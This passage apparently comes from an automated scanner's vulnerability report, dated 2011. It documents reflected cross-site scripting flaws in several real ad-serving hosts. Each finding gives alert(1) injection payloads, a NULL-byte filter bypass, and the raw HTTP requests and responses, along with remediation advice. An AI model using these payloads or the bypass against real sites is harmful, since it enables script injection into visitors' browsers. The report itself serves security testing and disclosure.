HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6241 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:13 GMT Expires: Sat, 29 Jan 2011 05:20:13 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k%3Bh%3Dv8/3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313158a9'-alert(1)-'deb9cc6efed&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5648"-alert(1)-"e253305c7e0 was submitted in the tp parameter. This input was echoed as a5648"-alert(1)-"e253305c7e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8%00a5648"-alert(1)-"e253305c7e0&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6235 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:23 GMT Expires: Sat, 29 Jan 2011 05:20:23 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8%00a5648"-alert(1)-"e253305c7e0&forced_click=http://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4b0'-alert(1)-'02f22d66f55 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=89e4b0'-alert(1)-'02f22d66f55&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6241 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:24 GMT Expires: Sat, 29 Jan 2011 05:20:24 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=89e4b0'-alert(1)-'02f22d66f55&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\"> ...[SNIP]...
4.133. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/cm.rev_bostonherald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19073'-alert(1)-'0b09bb6dee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald/?19073'-alert(1)-'0b09bb6dee0=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 350 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:02 GMT Expires: Sat, 29 Jan 2011 05:20:02 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc84"-alert(1)-"f176a4fef5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsi/adi9cc84"-alert(1)-"f176a4fef5c/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=342128F502247A5E0A2B3E23143AA362; Path=/ Content-Type: text/html Content-Length: 7197 Date: Sat, 29 Jan 2011 01:55:07 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ce1"-alert(1)-"42b69e5e783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsi/adi/N4682.132309.BURSTMEDIAa5ce1"-alert(1)-"42b69e5e783/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A1FD6EEE9A8663932F7BDCC831DC7153; Path=/ Content-Type: text/html Content-Length: 7197 Date: Sat, 29 Jan 2011 01:55:08 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0ee1"-alert(1)-"bd76f740cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7a0ee1"-alert(1)-"bd76f740cf;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=9F66F5B713694023D3CE9D57322BE3AC; Path=/ Content-Type: text/html Content-Length: 7196 Date: Sat, 29 Jan 2011 01:55:08 GMT Connection: close
4.137. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net.57389.9231.302br.net
Path:
/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11090"-alert(1)-"5cd4535793b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?&11090"-alert(1)-"5cd4535793b=1 HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5127D245BC3250ACF31540E5AF36C9C9; Path=/ Content-Type: text/html Content-Length: 7201 Date: Sat, 29 Jan 2011 01:55:06 GMT Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload facb6"-alert(1)-"b1f9c18d965 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?facb6"-alert(1)-"b1f9c18d965 HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CBEEFDB089EB7BC4DEF5E5E91E7C4697; Path=/ Content-Type: text/html Content-Length: 7198 Date: Sat, 29 Jan 2011 01:55:06 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5169"-alert(1)-"6db9eb136ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/adjc5169"-alert(1)-"6db9eb136ba/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=52485E91EC42E968E3BD3A7776779500; Path=/ Content-Type: text/javascript Content-Length: 6820 Date: Sat, 29 Jan 2011 05:20:30 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a12"-alert(1)-"4fefc518825 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/adj/N4682.132309.BURSTMEDIA88a12"-alert(1)-"4fefc518825/B4421704.7 HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7D54379AD5454BE506B7140F745360AC; Path=/ Content-Type: text/javascript Content-Length: 6820 Date: Sat, 29 Jan 2011 05:20:31 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5d1"-alert(1)-"6727e37c905 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.72e5d1"-alert(1)-"6727e37c905 HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6C3A37B834F620543E1586EF494A62CC; Path=/ Content-Type: text/javascript Content-Length: 6820 Date: Sat, 29 Jan 2011 05:20:31 GMT Connection: close
The value of the abr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3cc"-alert(1)-"89837e3663b was submitted in the abr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7;abr=!ie;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?dc3cc"-alert(1)-"89837e3663b HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CB04512BF419206D1DEA473C1878274B; Path=/ Content-Type: text/javascript Content-Length: 6970 Date: Sat, 29 Jan 2011 05:20:27 GMT Connection: close
4.143. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net.57390.9231.302br.net
Path:
/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 881c8"-alert(1)-"8139a7defa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7?881c8"-alert(1)-"8139a7defa5=1 HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7E827396F7BF67C1E502BB2D40424D9B; Path=/ Content-Type: text/javascript Content-Length: 6834 Date: Sat, 29 Jan 2011 05:20:27 GMT Connection: close
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cc9"><script>alert(1)</script>2c0fb4b63c9 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=97cc9"><script>alert(1)</script>2c0fb4b63c9 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 16:37:16 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 28 Jan 2011 16:37:16 GMT Content-Length: 377
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1f6b<script>alert(1)</script>6ed7f121a0a was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=7hSy8PbjRnOXSf2i_40364845d1f6b<script>alert(1)</script>6ed7f121a0a HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6607FF9B548A802C9DD6B8C4F5986A9A; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 28 Jan 2011 16:37:19 GMT Connection: close
4.146. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28b8"-alert(1)-"6a97e4dd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=1603038&f28b8"-alert(1)-"6a97e4dd9a=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:56:11 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sat, 29 Jan 2011 01:56:11 GMT Pragma: no-cache Content-Length: 4633 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&f28b8"-alert(1)-"6a97e4dd9a=1&s=1603038&_salt=4229063232";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be2a'%3balert(1)//1e4afaaa4ee was submitted in the h parameter. This input was echoed as 2be2a';alert(1)//1e4afaaa4ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=0CC81D8&w=300&h=2502be2a'%3balert(1)//1e4afaaa4ee&rnd= HTTP/1.1 Host: ads.roiserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Fri, 28 Jan 2011 16:44:01 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D8&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90072"%3balert(1)//78cfa7c28ea was submitted in the pid parameter. This input was echoed as 90072";alert(1)//78cfa7c28ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=0CC81D890072"%3balert(1)//78cfa7c28ea&w=300&h=250&rnd= HTTP/1.1 Host: ads.roiserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Fri, 28 Jan 2011 16:43:59 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D890072";alert(1)//78cfa7c28ea&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c51d0'%3balert(1)//00d506c594f was submitted in the w parameter. This input was echoed as c51d0';alert(1)//00d506c594f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
